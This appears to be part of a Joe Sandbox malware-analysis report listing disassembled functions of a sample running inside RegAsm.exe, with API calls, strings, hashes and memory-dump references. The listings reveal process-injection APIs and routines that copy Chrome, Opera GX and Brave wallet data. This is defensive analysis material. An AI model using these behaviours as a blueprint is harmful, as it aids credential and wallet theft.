Opcode Fuzzy Hash: db099f4af4738ec115f628e51b7a63cde01c556720f86861985000e835bbf067
Instruction Fuzzy Hash: 77D15970A042599BCB15CBA8C8807ADBBF2EB48314F289566E455F7396C734AD82CB94

Function 00ED1218 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00ED12A0

Memory Dump Source

Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 902b43b51291e1fe72d5783e1cc43356b32950ebc97a10a4155791ea7f21ee69
Instruction ID: b06833b48fe5aecdf590b7d5baa08a577743cf9d08f42079124b83a43c3310a3
Opcode Fuzzy Hash: 902b43b51291e1fe72d5783e1cc43356b32950ebc97a10a4155791ea7f21ee69
Instruction Fuzzy Hash: 192133B1C002599FCB10DFAAC880ADEFBF0FF88320F10852AE959A3250C7359944CFA5

Function 00ED1220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00ED12A0

Memory Dump Source

Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9690ad60df8c17d957101a38cf2b9a06dcc833790f7a887d273ac73123bbe0f1
Instruction ID: 70e7df915075783b48b95cb65fd348a3579197e5fe08d7995524992e1dde0c16
Opcode Fuzzy Hash: 9690ad60df8c17d957101a38cf2b9a06dcc833790f7a887d273ac73123bbe0f1
Instruction Fuzzy Hash: 682110B19002599FCB10DFAAC980ADEFBF4FF88310F10842AE959A7250C775A944CFA5

Analysis Process: RegAsm.exePID: 396, Parent PID: 4108COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(75290000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(73440000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(752C0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(74EC0000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(75BD0000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(75A70000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(75450000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(75DA0000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6F070000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(75AF0000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(75D90000), ref: 004193B5
GetProcAddress.KERNEL32(6F8E0000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6C400000,SymMatchString), ref: 0041942F

Strings

InternetSetOptionA, xrefs: 0041932A
WriteProcessMemory, xrefs: 00418D9E
GetThreadContext, xrefs: 00418D46
SymMatchString, xrefs: 00419429
dbghelp.dll, xrefs: 00418E52
CreateProcessA, xrefs: 00418D30
HttpQueryInfoA, xrefs: 00419314
ResumeThread, xrefs: 00418D88
SetThreadContext, xrefs: 00418DB4
ReadProcessMemory, xrefs: 00418D5C
VirtualAllocEx, xrefs: 00418D72

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\%s, xrefs: 00414E10
%s\%s\%s, xrefs: 00414DF9
%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414DBC

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Preferences, xrefs: 0040A023
Google Chrome, xrefs: 0040A4B9
Opera GX, xrefs: 00409E8B
\BraveWallet\Preferences, xrefs: 0040A105
Brave, xrefs: 0040A00D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C0E35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C16F688,00001000), ref: 6C0E35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0E35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C0E35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0E363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0E369F
__aulldiv.LIBCMT ref: 6C0E36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C0E3773
EnterCriticalSection.KERNEL32(6C16F688), ref: 6C0E377E
LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C0E37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C0E37C4
EnterCriticalSection.KERNEL32(6C16F688), ref: 6C0E37CB
LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C0E3801
__aulldiv.LIBCMT ref: 6C0E3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C0E3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C0E3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C0E394C

Strings

GenuntelineI, xrefs: 6C0E3639
AuthcAMDenti, xrefs: 6C0E3946
GTC, xrefs: 6C0E3912
QPC, xrefs: 6C0E38FC
MOZ_TIMESTAMP_MODE, xrefs: 6C0E35DB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 490c85a5aabfd16267fd95718e992531dc9bfd9a4f82dbd5881d762721501462
Instruction ID: 0da029f5823dd4dccf2768b029ebeecd12d1958d632160af9cef16da3441c47f
Opcode Fuzzy Hash: 490c85a5aabfd16267fd95718e992531dc9bfd9a4f82dbd5881d762721501462
Instruction Fuzzy Hash: EAB1C6B1B483109FDB08DF2AC85472A7BF6BB8D704F058A2DE4A9D7760D7709901DB91

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 004160D3
%s\*, xrefs: 0041600C
%s\%s, xrefs: 0041608B

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
